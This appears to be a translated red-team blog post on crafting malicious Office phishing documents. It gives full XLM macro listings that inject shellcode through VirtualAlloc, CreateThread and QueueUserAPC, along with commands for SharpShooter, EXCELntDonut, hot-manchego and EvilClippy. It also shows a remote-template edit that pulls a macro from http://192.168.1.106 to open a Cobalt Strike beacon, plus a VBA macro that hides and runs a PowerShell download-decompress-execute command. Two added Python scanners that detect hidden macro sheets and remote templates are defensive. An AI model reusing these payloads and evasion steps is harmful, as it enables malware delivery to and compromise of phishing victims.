I have written about phishing documents of this kind before; today I am adding another short piece in the hope that it is useful.
1. XLM Macro (Excel 4.0)
Unlike ordinary Office documents, these macros are written in XLM, which is not the same thing as XML. XLM was created in 1992, long before VBA existed.
Let us start with a simple demo:
The technique was pointed out in 2018 in this article: https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/
A number of related projects have grown out of it, for example Excel4-DCOM (https://github.com/outflanknl/Excel4-DCOM):
```powershell
Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
```
It too relies on XLM to call the Win32 API and perform remote thread injection:
SharpShooter: https://github.com/mdsecactivebreach/SharpShooter. An XLS macro is created with this tool as follows:
```shell
SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee
```
The generated SLK file looks like this:
The principle is essentially the same. These examples are all x86-based, however; x64 has some issues, which this article (https://www.cybereason.com/blog/excel4.0-macros-now-with-twice-the-bits) describes.
The tool that eventually came out of that work: https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a
In other words, on x64 it uses QueueUserAPC for the injection.
There are of course many other related tools (Macrome: https://github.com/michaelweber/Macrome, EXCELntDonut: https://github.com/FortyNorthSecurity/EXCELntDonut) and so on.
Process injection
XLS supports Win32 calls, which means operations such as process injection are possible. The calling convention is as follows:
```text
REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)
```
Note that x86 and x64 must be handled differently. The x86 demo is as follows:
```vba
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=Valloc(0,65536,4096,64)
=SELECT(B1:B999,B1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"excel")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=CThread(0,0,A10,0,0,0)
=HALT()
```
The x64 demo is as follows:
```vba
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=WHILE(A22=0)
=SET.VALUE(A22,Valloc(A21,65536,12288,64))
=SET.VALUE(A21,A21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=SELECT(C1:C3479,C1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"EXCEL")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=RTL(A22+(D1*10),ACTIVE.CELL(),LEN(ACTIVE.CELL()))
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=Queue(A22,-2,0)
=Go()
=SET.VALUE(A22,0)
=HALT()
```
For convenience, EXCELntDonut is used here to generate it directly. Generate the shellcode with CS, then substitute it at the specified location:
Then run:
```shell
EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll
```
Then insert the data and process it:
Then simply execute it. Unfortunately it kept failing during my testing.
Evasion
The effect is the same:
Hiding the macro sheet (https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/b9ec509a-235d-424e-871d-f8e721106501):
That is, change the value to 02.
At this point the sheet can no longer be unhidden:
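From the defender's side, the hidden state lives in the BoundSheet8 record referenced above. The following scanner (an added example, not code from the post or from any of the tools it links) walks a BIFF8 Workbook stream, decodes each BoundSheet8 record and reports every Excel 4.0 macro sheet together with its visibility, so a "very hidden" (02) macro sheet stands out. The sample stream is constructed inline; for a real .xls file, pass it the bytes of the OLE "Workbook" stream instead.

```python
"""Scan a BIFF8 Workbook stream for Excel 4.0 (XLM) macro sheets and report
their hidden state, including the 'very hidden' value 2 discussed above."""
import struct

BOUNDSHEET8 = 0x0085  # BoundSheet8 record id (MS-XLS)
EOF = 0x000A          # end of the workbook globals substream

HS_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0x00: "worksheet", 0x01: "xlm macro sheet", 0x02: "chart", 0x06: "vba module"}

def iter_records(stream: bytes):
    """Yield (record_id, payload) for each BIFF record up to the first EOF record."""
    pos = 0
    while pos + 4 <= len(stream):
        rid, size = struct.unpack_from("<HH", stream, pos)
        yield rid, stream[pos + 4:pos + 4 + size]
        pos += 4 + size
        if rid == EOF:
            break

def parse_boundsheet8(payload: bytes) -> dict:
    """Decode lbPlyPos, hsState (low two bits), dt and the short sheet name."""
    lb_ply_pos = struct.unpack_from("<I", payload, 0)[0]
    hs_state, dt, cch, flags = payload[4] & 0x03, payload[5], payload[6], payload[7]
    wide = flags & 0x01  # fHighByte: name stored as UTF-16LE instead of one byte per char
    raw = payload[8:8 + cch * (2 if wide else 1)]
    name = raw.decode("utf-16-le" if wide else "latin-1")
    return {"offset": lb_ply_pos, "state": HS_STATE.get(hs_state, "reserved"),
            "type": SHEET_TYPE.get(dt, hex(dt)), "name": name}

def find_xlm_sheets(stream: bytes) -> list:
    """Return every XLM macro sheet; hidden or very hidden ones deserve a closer look."""
    return [parse_boundsheet8(p) for rid, p in iter_records(stream)
            if rid == BOUNDSHEET8 and p[5] == 0x01]

def make_boundsheet8(offset: int, hs_state: int, dt: int, name: str) -> bytes:
    """Build a BoundSheet8 record (constructed test data, not taken from a real file)."""
    body = struct.pack("<IBB", offset, hs_state, dt) + bytes([len(name), 0]) + name.encode("latin-1")
    return struct.pack("<HH", BOUNDSHEET8, len(body)) + body

# Constructed globals substream: a BOF stub, a normal sheet, a very hidden macro sheet, EOF.
SAMPLE_WORKBOOK = (struct.pack("<HH", 0x0809, 16) + bytes(16)
                   + make_boundsheet8(0x1000, 0, 0x00, "Sheet1")
                   + make_boundsheet8(0x2000, 2, 0x01, "Macro1")
                   + struct.pack("<HH", EOF, 0))
```

With the olefile package, `olefile.OleFileIO(path).openstream("Workbook").read()` yields the stream to feed into `find_xlm_sheets`.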
EPPlus: EPPlus 5 - Excel spreadsheets for .NET
EPPlus is a .NET library for generating Excel files: https://github.com/EPPlusSoftware/EPPlus
With it you can produce an AV-evading Excel file; demo: https://github.com/FortyNorthSecurity/hot-manchego
Usage:
```bat
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs
hot-manchego.exe blank.xlsm vba.txt
```
Run the macro and a CS session comes back.
2. PowerPoint
This attack is triggered by mouse actions, such as a mouse click or mouse movement. The steps are as follows:
Insert the HTA file generated by CS. When it is clicked,
the CS beacon checks in.
3. Remotely loaded documents
Every document is a zip file: extract it and edit
Change it to:
```xml
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://192.168.1.106/1.dotm" TargetMode="External"/>
```
Now, when the document is opened and the macro runs, the beacon checks in.
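The relationship edit above is easy to spot on the defensive side because it must survive inside the package's `.rels` parts. This scanner (an added example, not code from the post) opens an OOXML package, collects every relationship marked `TargetMode="External"`, and flags attachedTemplate relationships whose target is an http(s) URL rather than a local template path. The sample package is constructed in memory with only the parts the check needs; on a real document, pass the file's bytes.

```python
"""Flag OOXML documents whose attached template is pulled from a remote host."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

def external_relationships(package: bytes) -> list:
    """Return (part, type, target) for every External relationship in any .rels part."""
    found = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append((name, rel.get("Type"), rel.get("Target")))
    return found

def remote_template_targets(package: bytes) -> list:
    """Targets of attachedTemplate relationships that resolve over http(s)."""
    hits = []
    for _part, rtype, target in external_relationships(package):
        if rtype == ATTACHED_TEMPLATE and urlparse(target or "").scheme in ("http", "https"):
            hits.append(target)
    return hits

def build_sample_docx(template_target: str) -> bytes:
    """Constructed minimal package: just enough parts for the check, not a valid Word file."""
    rels = (f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId3" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_target}" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/settings.xml", "<settings/>")
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()
```

A normal document created from Normal.dotm carries a `file:///` target here, which the check leaves alone; only an http(s) target is reported.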
4. Controls
```vba
Sub Main()
On Error Resume Next
createTextBoxs
ExecuteTextBoxCommands
End Sub
Sub createTextBoxs()
On Error Resume Next
Dim objTextBox As Shape
Dim secretkey As Long
Dim str As String
Dim zHf As String
Dim payload As String
payload = "" ' base64 blob removed from this listing; the original held a compressed PowerShell payload here
zHf = " -NoP -NonI -Command ""Invoke-"
zHf = zHf + "Expression $(New-Object IO.StreamReader ($(New-O"
zHf = zHf + "bject IO.Compression.DeflateStream ($(New-Object"
zHf = zHf + " IO.MemoryStream (,$([Convert]::FromBase64String"
zHf = zHf + "(\"" " & payload & " \"" )))), [IO.Compression.Compr"
zHf = zHf + "essionMode]::Decompress)), [Text.Encoding]::ASCI"
zHf = zHf + "I)).ReadToEnd();Read-Host;"""
secretkey = RGB(1, 33, 7)
Debug.Print "Adding Embedded Command Shape Into Document"
Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0)
With objTextBox
.TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1"
.Name = "Shell.Application"
.Height = 1
.Width = 1
.Visible = msoFalse
.Shadow.Visible = True
.Shadow.ForeColor.RGB = secretkey
If .Shadow.ForeColor.RGB <> secretkey Then
Debug.Print "Fail to set secret key"
End If
Debug.Print "Secret Key For Command Shape: " & CStr(.Shadow.ForeColor.RGB)
.AlternativeText = "ShellExecute"
.TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColor
End With
End Sub
Sub ExecuteTextBoxCommands()
On Error Resume Next
Dim objCmdShape As Shape
Dim secretkey As Long
Dim cmdParams() As String
Dim cmdCommand As String
Dim cmdType As String
Dim cmdObj As Object
secretkey = RGB(1, 33, 7)
For x = 1 To ActiveDocument.Shapes.Count
Set objCmdShape = ActiveDocument.Shapes(x)
If objCmdShape.Shadow.ForeColor.RGB = secretkey Then
Debug.Print "Discovered Command Text Object"
cmdType = objCmdShape.Name
cmdCommand = objCmdShape.AlternativeText
cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|")
Debug.Print "Command Type To Execute: " & cmdType
Debug.Print "Command To Execute: " & cmdCommand
Debug.Print "Command Params to Execute: " & Join(cmdParams, " & ")
Set cmdObj = Interaction.CreateObject(cmdType)
VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), cmdParams(1), cmdParams(2)
objCmdShape.Delete
ActiveDocument.Save
Exit For
End If
Next
End Sub
```
There is nothing magical about this technique: a macro creates an invisible control and then calls it to execute the malicious code. The code above cannot be used as-is; the PowerShell part has to be changed, which is left to the reader.
5. VBA Stomping
Literally translated it would be "VBA trampling". How should we understand it? Suppose we create a basic piece of VBA code:
When we extract the document and zero-fill the source, it still executes, like this:
Change it to:
It still works at this point.
Weaponized: https://github.com/outflanknl/EvilClippy
Build command:
```bat
csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs
```
Usage:
```bat
EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc
```
This gives you a processed document.
Summary
The above covered some common tricks used in phishing documents; I hope it is helpful. Combined with one another, they are even more effective.